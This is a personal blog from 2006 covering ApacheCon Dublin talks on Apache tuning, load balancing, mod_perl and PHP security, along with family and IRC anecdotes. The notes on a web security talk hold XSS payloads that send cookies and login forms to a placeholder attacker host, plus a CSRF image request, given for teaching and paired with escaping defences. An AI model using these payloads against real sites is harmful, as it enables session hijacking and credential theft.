Bigbro's foray into the scary world of blogging
06 2006
After an immensely satisfying, but tiring five days of conference, thanks were made to all the organisers. People were reminded that skycon and further apachecon events were coming up. Some free google merchandise was thrown at the crowd and we all went back to watching the Germany Vs Argentina match on the web, which is currently drawing 1-1 in extra time.
The Papers and Session material are (or will be) available online.
posted at: 18:17 | path: /technical | permanent link to this entry
Laura Thomson (OmniTI) presented "More of a rant and less of a technical talk" - it being Friday evening :-)
Firstly, frameworks - they're largely buzzwords and since there's no dominant paradigm, so they tend not to be a huge help with maintainability. Having a clear, simple architecture that's easy to add to, easy to explain to new developers and easy to remember now and in two or five years time is best.
Be careful of the dubious merits of DB abstraction layers. They can be slow and cumbersome - and changing the PHP code to change database is most likely not going to be the most difficult part of the migration. Do use PDO, which is a standard for data access abstraction and standardise on the use of prepared statements.
Design for security
Sander Temme
Most websites that handle more than a moderate amount of traffic, or are responsible for generation of revenue, should probably think about scalability and reliability. These are good things to have, but cost money.
The reality is that moving parts break: hard disks, fans, hard disks, power supplies and HARD DISKS are all prone to failure. Hard disks are not all born equal - buy good ones with reliability and the longest warranty. Mirror disks, use RAID - and remember, RAID will not help if you're not notified of failures. Redundant power supplies are great, especially if they're plugged into different circuits.
You can load balance using various techniques, e.g. F5, Alteon, DNS Round Robin, Cisco, Juniper, etc. DNS Round robin is the cheapest and most simple, but also most prone to failure because clients cache DNS info - so if a server fails, any clients with its IP address will continue to fail.
Network Load Balancer is a technology that comes with Windows Server 2003 - it's application independant so should work with Apache. It works with up to 32 hosts and all hosts in the cluster assume the same IP and MAC address. NLB makes the decision as to which server answers the TCP handshake, which determines which host is responsible for the connection.
Linux Virtual Server is an ip virtual server module that comes with the linux kernel.
Apache mod_proxy and mod_balance can be used to load balance. This includes some clever stuff that you can do with Jakarta and TomCat using IP Multicast, which means that if the Apache load balancer detects at a machine has died, the connection will stay up and it will get another server to handle the request.
Sander demoed a mod_jk example which load balanced between 3 tomcat instances, displaying the debug logs as we went and killed things. Everything worked seamlessly. Note that your objects in your web applications must be serialisable, otherwise load balancing will fail with mod_jk. Many applications do not adhere to that and are not clusterable.
More information and slides at: people.apache.org
posted at: 16:49 | path: /technical | permanent link to this entry
Sander Temme
AllowOverride none for the best performance.MaxClients to match the CPU performance. Generally CPU performance is the limiting factor nowadays, since memory is relatively freely available in today's servers.server.xml, tune minProcessors, maxProcessors; use APR->Persistent connections and tune the JVM (heap, garbage collection, etc.) For MySQL, note that it ships with multiple useful configurations: my-{small|medium|large|huge}.conf. Note that every child makes a DB connection for PHP and prefork. Tune the max_connections variable in my.cnf. Apache 2.2 now supports connection pooling, so one database connection can be shared between children.ulimit -S -n `ulimit -H -n` which means that Apache sets the soft limit to the hard limit for open files. Make sure it's set to something sensible and to a value that will work on your server.Colm MacCarthaigh (HEANet)
Colm presented this talk to a room bursting with people; extra chairs were brought in and
50,000 users is not a lot in terms of computing power today, so how do we make the webserver handle this many, and more.
.htaccess file enabled, Apache checks the requested directory, and every parent directory is checked for .htaccess files - for every request. This can really slow things down.noatime since that saves a write for every hit. This can do anything up to double your filesystem performance. Increase the i-cache size. Try different block sizes on the filesystem.William Rowe (Covalent Technologies) presented the new Apache 2.2.2 installer, now with SSL, that's available for Windows.
Apache and the toolset is distributed as a binary, since there's no expectation that a compiler will be available. Even with a compiler, it can be difficult to compile and build things like PHP.
The installer does all the things you might expect, including displaying the AFL, allowing some basic configuration information to be entered. Generally, it's recommended that you create a normal user (rather than guest) because it's a royal pain to make a guest user have enough of the exactly right permissions for things like PHP to run correctly. For convenience, a new service called Apache2.2 is created, which can be manipulated through the standard Services management console. Service dependancies work, so you can configure the Apache service to wait until something like TomCat has started before starting.
IIS Side effect - if you configure IIS to bind to port 80 on one ethernet address, and you have more than one interface, it will bind to every adaptor it can find in the machine. How blessedly competent... *cough*
Crypt passwords are not supported on Windows, so be sure to use hashed password (MD5 or SHA1 for example) and since we're trying to deprecate MD5, please try and move towards SHA1.
Before running Apache, we need to change the permissions for the logs/ directory and the proxy/ directories. This is where Apache wants to store logs and cached files respectively. Add write permissions for the user you created earlier.
The configuration files are broken into a small httpd.conf file, with includes pointing at files in the extra/ directory. This means that modules can be enabled and disabled simply by commenting out or uncommenting include lines. Remember to use / (forward slash) as the path delimiter, and quote whitespace in filenames. Apache configuration understands forward or backward slash in most cases, but things like mod_rewrite will need everything to be forward slash delimited.
The OpenSSL config file is not shipped with Apache 2.2.2 (promised that this will be fixed in 2.2.3) but you can pull the latest from the openssl website. Full details of this will be in the slide-set for this presentation (I will update the link to point directly at the slideset as soon as William has time to put it up.)
More information at:
Rich Bowen, after giving an talk on mod_rewrite earlier today, had the following 10 things your webserver can do that you might not yet know about. It should be noted that Rich is a mathematician, hence his excellent counting abilities.
Paul Fremantle had the following to say regarding Apache (the webserver) and Irish Music (the diddly-diddly stuff that's not a webserver, for the confused among you) and why they are alike:
So what is on Ken's belt? Well, in the 5 minutes allotted for an ApacheCon Lightening Talk, he managed to get through and model for us, the following:
Cliff Schmidt presented an analysis of various different open source licenses. There are currently 58 approved OSI licenses, so there's quite a bit of ground to cover when it comes to this field of study.
While I would have liked to blog more material, but the 4 hours covered so much material, which bounced from topic to topic so fast that any attempt to make a coherent set of notes would have been doomed to failure - and would have resulted in me missing the next three topics while I typed up the first.
I'll post a link to the slidesets when Cliff makes them available on t'internetwebsuperhighway.
And now - onwards to the lightening talks.
posted at: 18:18 | path: /technical | permanent link to this entry
I need to do a serious evaluation of the people I hang around with! From IRC today:
[11:49] seb bruce: is this "too much pepsi" bruce? [11:58] bruce seb: I never drive pepsi on this side of the pond! [11:59] seb bruce: but you did, on a bus from belfast, whilst waxing lyrical about peas..... [12:00] seb .. or was it beans... [12:00] seb i cant remember... [12:01] bruce seb: twas coke _not_ pepsi, and I spoke about the inside of a rice-crispie, I believe.
Philippe Chiasson
We've seen that mod_perl can make your CGI code run a lot faster, without making any changes to the source. Let's look at how we can make things even faster by making some code changes to optimise things.
First, use mod_status and ab for benchmarking. Comparing apples with apples is important. When you have mod_perl installed, you can use Apache2::Status, which is the mod_perl equivalent. No overhead and comes with the mod_perl package, so you already have it and there's no disadvantage to having it configured on a production server (assuming you don't allow the world to access it.)
A useful method of looking at memory is GTop for perl, which only works on Linux systems, but usually comes with Gnome.
use GTop;
my $gtop = GTop->new;
my $proc_mem= $gtop->proc_mem($$);
for( qw(size vsize share rss )) {
printf "%s => %d\n", $_, $proc_mem->$_();
}
PerlModule CGI PerlModule DBI ...
DBI->install_driver('mysql');
CGI->compile(':all');
use ModPerl::RegistryLoader() and call the handler($url, $filename) to pre-populate the Registry cache. Be very careful that the URL does match the file pointed at, otherwise you're putting dirty data in the cache and all bets are off. This means your script is in shared memory - so be careful, because if you change the code, every thread will have to reload the script and you'll have n copies of script in memory (where n is the number of threads running.) Of course, the obvious way of getting around this is to restart the server so that the cache is pre-populated with the updated code.handler() with the multiple URLs.use Apache2::Const qw(OK DECLINED); return OK;
use Apache2::Const -compile => qw(OK DECLINED) return Apache2::Const::OK
SetHandler perl-script means that lots of things are done for you, such as STDIN/STDOUT are tied, %ENV, @INC are saved/restored and %ENV changes are propogated. All of these things are done automatically, but if we don't need them (or are willing to work around them for performance gains) we can use SetHandler modperl which does none of these things. This means that it is NOT thread safe (since the environment is a per process value) and may leave HTTP environment variables on the environment. We have to be careful of security implications of this.PerlOptions AutoLoad # Default. Disabling means that you MUST preload everything. PerlOptions -GlobalRequest PerlOptions ParseHeader PerlOptions SetupEnv # Disable to give an almost empty environment.
Apache2::SizeLimit#startup.pl use Apache2::SizeLimit; $Apache2::SizeLimit::MAX_PROCESS_SIZE = 12000; $Apache2::SizeLimit::MIN_SHARE_SIZE = 6000; $Apache2::SizeLimit::MAX_UNSHARED_SIZE = 5000; $Apache2::SizeLimit::CHECK_EVERY_N_REQUESTS = 4; # httpd.conf PerlCleanupHandler Apache2::SizeLimitMore information on the sites mentioned in my earlier post on mod_perl.
Philippe Chiasson
After a comedy false start involving a picture of his new small child and the basics of how to install mod_perl 2.0, we got down to business.
mod_perl means you can save on CPU cycles, memory, money, time, effort (with Apache::* modules on CPAN) and probably a few other things too.
The CGI model:
ab -c1 -n50 http://blah/cgi-bin/hello.plLoadModule perl_module modules/mod_perl.so Alias /perlrun /var/www/cgi-bin
#!/usr/bin/perl
use CGI;
my $q = new CGI;
print $q->header('text/plain');
$counter++;
print <<"EOF";
counted $counter
EOF
Since we don't initialise $counter, the mod_perl / Registry caches the $counter variable, so depending on which fork of apache you hit, you'll hit $counter, which will increment - so you'll get values greater than 1.
The simple solution to this is to use my $counter always.my to create a variable, but action that variable in a subrouting from script-global scope, you may get funny effects similar to the previous example. This is because Registry uses 'subification' to convert each script into a subroutine. This means that subs in your scripts will be subroutines of subroutines, which can create a closure. A warning sign might be "Variable $counter will not stay shared at..." in logs. This effectively turns the $counter variable into a global attached to the subroutine.Google are giving out the Alectralight flashing Google logos at ApacheCon, with the super-bright flashing colourful LEDs on them - and a fairly strong magnet on the back.
Thing #1: The warnings say "For external use only." hahahahahahahahahahahaha!
Thing #2: A friend of mine was just complaining to me about them because he got one yesterday, and the magnet on the back erased his hotel room keycard. hehehe ;-)
posted at: 10:29 | path: | permanent link to this entry
Chris Shiflett (OmniTI)
The name, Cross Site Scripting comes from the original attack on Geocities - where a domain loaded in a frameset was able to affect content loaded from another domain, also in the frameset. It crossed sites and injected javascript. Browsers protect against this kind of vulnerability in framesets today, but there are other ways to do an equivalent type of thing.
Using PHP in the following context, you can inject any code which will run on the victim's machine.
<?php echo $_GET['user']; ?> ----->
http://blah/script.php?user=%3Cscript%3E... ----->
<?php echo '<script> ... ' ?>
With this, you can steal the cookie for the site being browsed by the user. Often session keys are stored in the cookies, which means you can now possibly hijack the user's session.
<script> document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script>
Cross Site Request Forgeries
How about using image loading to grab cookie information. You can hide the image by setting height and width of the image to zero, or using CSS to place the broken image underneath something else, making it invisible to the user.
<script>new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie);</script>
How about stealing passwords by changing the action of the first form on a page? If the login form isn't the first form, a small bit of trial and error will find out which form it is. This can be made more transparent to the user by using more javascript to further send the same information on to the real server, so the user logs in. This is a basic MITM attack.
<script>document.forms[0].action = 'http://host/steal.php';</script>
How about making the javascript source look smaller - it's simple:
<script src="http://host/evil.js"></script>
Now you can insert as long a script as you like.
We also have to be careful about character encoding - here's why:
A browser such as IE will try to auto-detect the character encoding which means that escaping the output may fail.
<?php
$string = "<script>alert('XSS'); </script>";
$string = mb_convert_encoding($string, 'UTF-7');
echo htmlentities($string);
?>
Make sure that Content-Type: text/html; charset=UTF-8 and htmlentities($foo, ENT_QUOTES, 'UTF-8'); match.
AJAX is here to stay, and has inspired a new interest in javascript. This means that there's more javascript enabled browsers, more websites running javascript dependant content - and more and more people learning how to exploit XSS because it's more attractive to do so.
It can make XSS exploits more dangerous, because the AJAX security model depends on domain sandboxing.
Case study (CSRF)
A MySpace user, Samy, managed to get 3 million friend requests in 24 hours or so, resulting in the site having to be taken offline for some time to repair the damage.
A CSRF attack comes from the victim's computer, and follows all the rules for http requests. Generally, the victim already has an account so authentication is bypassed (since it's a valid user), and will be from valid IP space, etc., etc.
<form action="buy.php" action="post">
<input type="hidden" name="isbn" value="1234567"></input>
First check to see if the buy.php script will accept GET as well as POST.
If so, set up an image as <img src="http://host/buy.php?isbn=1234567" /> ---->
GET /buy.php?isbn=1234567 HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
So now the attacker has got the session ID for the user's session.
If you don't allow GET, there's still a way. Create the form with width and height 0 and set the layer as transparent in CSS.
MySpace use a one-time token to ensure that any forms that take action have a unique value. This eliminates all the examples shown so far. But XSS can work around the security model for AJAX. The solution is by making the user request the form but request that it be returned to the attacker, rather than the victim. The MySpace worm used AJAX to discover the token to discover the token.
Samy put the AJAX code in his profile, so anyone who viewed his page was added as his friend. He then added the feature that it would also add the code to their profile - so anyone who then viewed their pages would be added as his friend. This led to an exponential growth in friend requests for Samy. I found a technical description here.
[filter] --> [business logic] --> [escape] -->
By escaping the output carefully, we can remove the issues associated with XSS.
Here's an example of how you can put all your clean data in an array. Worst case, an array element is missing since it was dirty in some way, so this needs to be handled...
<?php
$clean = array();
if (ctype_alpha($_POST['name'])) {
$clean['name'] = $_POST['name'];
} else {
/* Error */
}
?>
Let's use 'defense in depth' by still quoting the output, even though we've cleaned up the input. This has shown to be valuable, because sometimes we make mistakes.
<?php
/* Content-Type: text/html; charset=UTF-8' */
$html = array();
// Clean the data...
$html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8');
echo "<p>Welcome {$html['name']}.</p>";
?>
More information available at:
Christian Wenz
This discussion proved so popular, with people spilling into the aisles of the room, that this presentation was moved to the larger business track room, displacing it. Some minor reshuffling later, we settled in to watch Christian's presentation.
Where should people be taught about security in programming? On average, almost one vulnerability per day is detected in OSS.
With forms that accept arbitrary text, javascript code can be inserted. script tags can be inserted and cookies can be grabbed by http://loser.tld/? + document.cookie; or similar. This means that the cookie can be stolen without the user knowing. XSS has been around on the web for a long time now.
With AJAX / XMLHTTP Request a whole new set of possibilities opens up. There is a security model in place (same domain) but do you trust your browser to enforce this?
Escaping <, >, &, "e;, ' does the trick, but be careful of the charset. Stripping script tags does NOT do the trick, because of pseudo URLs.
With databases, SQL Injection can allow access to the data - including private data. Some examples were given of basic SQL injection attacks. This included a demonstration of DoS by making an injection attack benchmark a UNION SELECT which generated md5 hashes of random data.
A subjective talk by Brian W. Fitzpatrick, from Google. The 'W' is to distinguish him from the band of the same name, he assures us :-)
To determine whether a project is successful as an OSS project, first you have to define success. Some companies seem to think that making their software Open Source will provide a huge amount of publicity. This may not be the case, unless they do it right. Trying to use OSS to make other people write the code for you, or maintain it, is almost always doomed to failure.
A successful project:
Mark Shuttleworth kicked off the business track of ApacheCon '06 with an introduction to Ubuntu, its ideals and how Canonical fits into the whole Open Source initiative.
Ubuntu is working at making a great product, with Canonical as the anchor-tenant providing quality assured support. It's a meritocratic dictatorship (possibly?) rather than a democracy : Canonical is about finding great people and publicising their works. Forks are actively encouraged, supporting the concept of genuine freedom and flexibility.
We're on a race to zero licensing fees, with Ubuntu merely being slightly ahead of the curve at its price tag. Certification and Standard compliance is gradually coming, as is internationalisation and localisation. This is a slow process, but is starting to happen.
We're still limited as we won't ship non-free software, so until things like Harmony happen, there's a limited amount for support for things like a J2EE environment, etc.
Try to stay close to upstream distributions, so we're facing the same issues at the same time. This means that bugs can be fixed once and once only. Work is published early and often, so feedback can be gathered. Services like launchpad.net allow work to be submitted, tracked and ensure there's the best chance of finding, tracking and solving bugs in the right place. If this means pushing materials upstream, and that's the right thing to do, launchpad makes that easy (or at least trackable and manageable.)
Ubuntu supports rebranding. People like to take a product and 'own' it - this means that we might see Ubuntu in lots of countries in the future, but it might be called something other than Ubuntu. There's already a family of distributions, Kubuntu, Edubuntu, etc. Many more are envisaged.
Getting involved is what it's all about.
Dapper is the first release with a guaranteed support, including commitment financially that support will continue even if Canonical shuts down. Three years on the desktop and five years on server distributions means that Ubuntu is being put forward as enterprise ready.
Ubuntu is going from strength to strength. Pretty much every hand in the room went up when Mark asked who used or had used the distro. Serious financial committment to support over 3 and 5 years respectively means that there's no reason for industry to be scared that they'll be left with a broken infrastructure and no support. We just need to keep making sure that Bug #1 remains the top priority.
posted at: 11:21 | path: /technical | permanent link to this entry
Mark Shuttleworth introduced his view on F/OSS and whether the battle for the desktop has been won. The presentation tools used were Ubuntu and OpenOffice - which I'm only aware of because he switched applications during the presentation. His talk consisted of a number of points, detailed below. (Again, apologies for being brief, I was typing as he spoke.)
#13 : Pretty is a FEATURE
"It takes ten times as long to create great software that looks good and is easy to use, as it is to just produce great software."
#12: Consistent PACKAGING
This is a solved problem, but leadership is required from the various leaders of the various distributions - perhaps now is the time to standardise and work on reducing the fragmentation.
#11: Simplified LICENSING
it's obvious really... isn't it? ;-)
#10: Pervasive PRESENCE
We're getting to the stage in software and particularly in operating systems where things should 'just work.'
#9: Pervasive SUPPORT
People still have a concept that Linux is not supported. We need to transform the 'grass-roots' support into a pervasive support structure that everyone can grasp and utilise.
#8: Govaritye PA RUSSKI
Localisation is a huge barrier to adoption, not necessarily by the IT professionals, but by the 5 billion other potential computer users.
#007: Great GADGETS
Linux is getting to lots of cool places, including smart phones, PDAs, the $100 laptop, etc. But when you look at how it's done, there's a huge amount of fragmentation in implementations and functionalities. We need to generate some championship and leadership to drive excitement into the market about this. Penetration of mobile phones on the continent is an order of magnitude greater than fixed line penetration - so there's a HUGE customer base.
#6: Sensory IMMERSION
We want to define a future which is engineered on free software, which makes voice available on the desktop (VoIP, etc.) along with video - so that people can immerse themselves in their desktop.
#5: Getting it TOGETHER
We have an opportunity to leapfrog the commercial collaboration products and provide the tools and environment so that the software can truly enable people to become more productive. E-mail, pervasive connectivity and revision control are some of the tools we should look at bringing to the desktop and office environment. Wouldn't it be nice to be able to invite some other person into your desktop to work with you?
We've already seen some good things happening regarding this in the software world - for example, when Firefox became as good as the commercial alternatives, we saw an explosion in development and a huge wealth of external development, plugins, etc. We want to being this to the desktop.
#4: Plan, execute, DELIVER
We're good at planning and pretty good at executing, but perhaps not so good at the delivery part. F/OSS tends to be built by large numbers of fragmented communities and we need to communicate to the community what's going on, what has been done, what needs to be done and who is responsible for that. This should give a good idea of when things might be ready.
#3: The extra DIMENSION
Mac OS X set the benchmark and it looks like Microsoft will take the lead with Windows Vista. We need to bring tools together and provide new ways of working to make people want to use Linux on the desktop.
#2: Granny's New CAMERA
Linux is already a great desktop for a power user - and is excellent for producing thousands of replicated terminals, or office 'standard configuration' machines. What we need to work on is the middle-ground - the home PC. When Granny plugs in her camera, we want to allow her to install the driver for her camera, or do it automatically, so that she perceives that the camera 'just works.'
#1: Keeping it FREE
The freedom is what drives many of the developers. Keeping it free is Mark Shuttleworth's number one priority and wants the same software available to a millionaire in London and a kid growing up in a shanty town in South Africa.
Solving BUG #1 is the top priority.
posted at: 10:41 | path: /technical | permanent link to this entry
From the annals of Steve-Teh-Wonder-Cook(tm)...
[19:18] diamond huh. burning smell. that's not good. [19:19] atlas Are you "cooking" again? [19:19] diamond atlas: you mean pouring milk into a bowl of cereal? no, not yet. [19:20] atlas Hmm. I've no idea what it could be then [19:21] diamond found the issue. luisa was on fire in the kitchen. [19:22] atlas How inconsiderate of her. [19:22] diamond yeah. i'm ringing the immigration fire brigade to get her put out.
Theo Schlossnagle (OmniTI) spoke about a solution for serving a massive amount of largely static images.
Why pay Akamine(sp?) or NetApp lots of money for bandwidth, network infrastructure or webcache devices, when you can roll your own.
Peer-based HA caching with something like Apache + mod_proxy (Reverse proxy + caching) might work well. There are some caveats - such as other people's caches, which might not respect cache directives.
The example given was a three-site HA solution. Finding the 'closest' image server was achieved through using local DNS servers, colocated with the image servers. Anycast (all the DNS servers have the same IP address and BGP takes care of finding out which is the 'closest' DNS server.) DNS uses UDP which means that it's safe to use Anycast for serving - however, the image servers would use TCP connections, which will not work if the internet topology/routing changes in the middle of a session.
So if you have 3 DNS servers, each with the same IP address in 3 geographically diverse locations, 3 servers ready to serve static image content, your own AS for BGP routing and a large amount of static image content - you can use F/OSS software and commodity hardware to make a HA/LB solution that will handle an enormous load.
What about distributed reliable logging? Something like a spread patch to syslog-ng allows logs to be written in 'real' time to multiple servers, reliably.
Blogs can benefit hugely from caching. Something like memcached might work for a read-heavy, write-light dataset. User preferences can be stored in user cookies which will provide all the nodes you ever need, along with all the resilience you'll ever want. If someone loses their cookie (or deletes it) you can just look up their preferences in your database and regenerate their cookie - if their cookie gets corrupted or their browser breaks, they only remove service from themselves.
Apologies for the terseness of this article, but information was coming hard and fast - and I can only typo at a certain rate ;-)
posted at: 16:39 | path: /technical | permanent link to this entry
Afer a largely uneventful, though delayed, flight, I arrived in Dublin. Immigration was less crowded than usual, the walk from the RyanAir terminal to the main airport building was longer than usual and the arrival of my bags was more prompt than usual. I guess it all averages out in a woefully uninteresting manner though. In a similarly uninteresting vein, Dublin's weather had returned to the bleak grey dampness to which I have become accustomed, leaving my sunglasses to dangle forlornly from my collar.
After topping up my phone and calling one of the ApacheCon organisers to see where best to meet up with them, I did my usual inept dance of trying to exchange all Sterling money on my person for Euro - failing utterly to complete this by the time I had to pay for a bus ticket. I now have an unnerving weight of Euro shrapnel (coins) in my pocket to attempt to get rid of over the next few days.
HEANet are generously providing internet connectivity for the event, but I've been warned that this means there's a collection of wireless APs to be configured and installed. I suspect this will keep me occupied for at least a chunk of the remaining afternoon. It also means there's a good chance that I (and probably many like-minded, but superior writers) will be able to keep a mostly up to date blog of the event as it happens. I guess you, dear reader, will find out whether this happens or not. ;-)
posted at: 16:05 | path: /technical | permanent link to this entry
Having only just returned from Ireland, I'm flying back to Dublin again to attend ApacheCon 2006. It should be a most interesting opportunity to hear some differing views from various industry sources on the future of Apache, web applications and Open Source Software in general. I'm certainly looking forward to it.
I'll be blogging parts of the ApacheCon 2006 event here (and on skynet) as the event unfolds.
posted at: 08:37 | path: /technical | permanent link to this entry
It is the way of things... (from poisonedminds.com)
posted at: 01:05 | path: /lotd | permanent link to this entry
I attempted to do some exercise earlier today, only to be turned away by a large sign on the door of the gym stating that it was closed until further notice. Apparently the company has gone bust and the gym is to be shut down permanently. This sucks! :-(
Looks like I'll have to find some alternate means of burning off the excess lard which I consume on a regular basis.
posted at: 03:16 | path: | permanent link to this entry
I finally managed to find the time to investigate the fate of neutron's disk array, the failing of which caused the whole machine to die unceremoniously a few days back. Turns out that it was a simple disk failure, which was simple to isolate and fix due to the disks being mounted in removable caddies. With my data stored as RAID5, the single disk failure was not a problem...
However: neutron is a cheap, IDE based system and this failure highlighted the differences between it and a commercial, carrier grade server. Although I lost no data, neutron would not successfully boot with the failed disk on the IDE bus.
The rebuild from degraded state of the large RAID5 array, upon which my data sits is almost completed now:
eason@neutron:~$ cat /proc/mdstat
Personalities : [raid1] [raid5]
md1 : active raid5 hda2[5] hde2[0] hdg2[4] hdb2[3] hdf2[1]
976623104 blocks level 5, 64k chunk, algorithm 2 [5/4] [UU_UU]
[================>....] recovery = 81.0% (197838464/244155776) finish=34.5min speed=22349K/sec
I would just like it stated, for the record, that I win - purely on the basis that I purchased a box of 18 assorted fruit tarts at Tescos earlier. Mmmmmmm - jammy, sugary goodness!
posted at: 20:39 | path: | permanent link to this entry
Dilbert sometimes features a character that
must always be bigger and better than everyone else. He makes me laugh.
Sometimes, for completely different reasons, real-life people make me laugh
too...
[10:43] <m1> gah. i've just spent the past half hour crimping the wrong connector pins onto ribbon cable :(
[10:44] <diamond> fun
[10:44] <diamond> i stood up there a minute ago, the headphones snagged on the arm of the chair causing the mp3 player to be yanked off the table, and then i headbutted the table while retrieving the mp3 player. it was not a happy moment
[10:44] <zoney> Ouch!
[10:45] <diamond> i then sat very still for a few moments to avoid making things worse, then slowly backed away from anything dangerous
[10:45] <zoney> diamond: still, you didn't electrocute yourself, so that's good
[10:45] <diamond> 'strue
From the ILUG mailing list, Padraig Brady had the following useful tips (repeated here so that I can find them and maybe not forget them):
Following on from my previous mail about finding cruft on a debian system with: (cat /var/lib/dpkg/info*.list ; find / -type f ) | LANG=C sort | uniq -u I find set operations like that quite common on the command line: For unsorted files: LANG=C sort file1 file2 | uniq #Union LANG=C sort file1 file2 | uniq -d #Intersection LANG=C sort file1 file1 file2 | uniq -u #Difference LANG=C sort file1 file2 | uniq -u #Symmetric Difference For sorted files: LANG=C comm file1 file2 | sed 's/^\t*//' #Union LANG=C comm -12 file1 file2 #Intersection LANG=C comm -13 file1 file2 #Difference LANG=C comm -3 file1 file2 | sed 's/^\t*//' #Symmetric Difference Note the LANG=C for speed as we're not interested in the actual order of the items. Padraig.
Looks like I've had my first hard disk failure in Neutron. I think it might actually be the disk rather than the disk controller this time - but who can say...
Of course, the disk that's failed is not one of the ones in the external caddies, which makes replacing it slightly more fiddly than I'd like - oh well. Tomorrow I'll poke at it more and see if my RAID5 setup has managed to save my data.
posted at: 02:25 | path: /technical | permanent link to this entry
I recently passed through Shannon airport and had cause to look up some train times for my destination. Fortunately, I had an Apple iBook with me and the Airport proudly proclaims that free Wireless internet connectivity is available. To cut a long story short, despite three attempts at getting some kind of connection to the net, registering 3 times and wasting a good 20 minutes of my life that I want back, please, I gave up on the whole thing.
I remember using wireless internet at the airport before - and it was good. I could log in, check my mail or open an IRC client and converse with a few friends and let them know that I was about to jump on a plane to some not-so-exotic destination. This was all good. Then someone got ideas abd additional features, I suspect... Features are almost always a bad thing, I've found. People wanting to add features to something that already just works should consider the impact of this very, very carefully. People who only test a wireless connection using Windows and Internet Explorer, with Javascript enabled, and cookies accepted from everywhere - including places that are not the originating site, and assume everyone uses webmail and/or can access their e-mail through port 80 - should be taught a few lessons about how the internet really works, possibly with the aid of a swift introduction to my LART.
For the benefit of anyone else wishing to set up a service that they're hoping people will use briefly, especially with limited time available to them, here's a few tips on how to make it accessible:
Over the past few days, Róisín the 'almost five-year-old' has uttered:
While on an airplane flying at somewhere approaching 30,000 feet:
"Why is the sky up here?"
Referring to her new Disney Beauty And The Beast book:
Róisín: "I'm Belle!"
Sínéad (in a teasing fashion): "I'm Belle!"
Me: (Maintaining the 'I'm Spartacus' theme): "I'm Belle!"
Róisín (upset): "You're NOT Belle! Daddies are beasts!"
Now, every time the beast appears in the story, either reading the book or listening to the accompanying CD, she enthusiastically points out to me that "This is your bit, daddy!"
While trying to elicit from her a reason as to why birds were in the trees in Bunratty, the following conversation emerged:
Me: (listening to the bird sounds in the trees) "Why do you think the birds are up in the trees? What do you think birds have that are in trees? ... Can you see anything else in the trees?"
Róisín: "Porcupines!"
(I was pretty much silenced by this remark and humbly pointed out the nests that I could see without really dealing with the issues of potential spiny ground-dwelling creatures having taken to the tree-tops...)
![[IPv6 Ready]](http://9-badges.ipv6ready.ie/9/94/2f/05/9942f05fd76ad162164ae4abe1b094cd49d0d070-m.png)
